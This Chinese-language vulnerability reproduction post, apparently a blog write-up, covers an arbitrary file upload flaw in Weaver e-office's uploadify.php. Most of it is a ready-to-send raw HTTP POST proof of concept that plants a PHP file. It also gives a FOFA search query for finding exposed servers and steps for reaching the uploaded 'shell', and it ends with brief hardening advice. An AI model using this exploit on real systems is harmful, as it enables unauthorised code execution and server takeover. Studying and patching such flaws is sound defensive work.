泛微OA e-office平台uploadify.php任意文件上传漏洞复现

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。

泛微OA e-office平台uploadify.php处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

0x03 影响平台

泛微e-office系统

0x04 漏洞环境

FOFA语法： app=“泛微-EOffice”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （POST）

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: ip:port
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=gfgea1saasf5dsgg5fd5fds15gf5kj51vd1s--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 233--gfgea1saasf5dsgg5fd5fds15gf5kj51vd1s--
Content-Disposition: form-data; name="Filedata"; filename="interface.php"
Content-Type: application/octet-stream<?php echo 12345678;?>--gfgea1saasf5dsgg5fd5fds15gf5kj51vd1s----

3.复现

执行数据包，并得到回显！！！

4.访问shell地址

访问路径/attachment/{{回显的数字}}/文件名.php
文件解析成功。

0x06 整改建议

1.设置权限限制，禁止上传目录的执行权限
2.严格限制可上传的文件类型
3.严格限制可上传的文件路径
4.文件扩展名服务端白名单校验
5.上传文件重命名
6.隐藏上传文件路径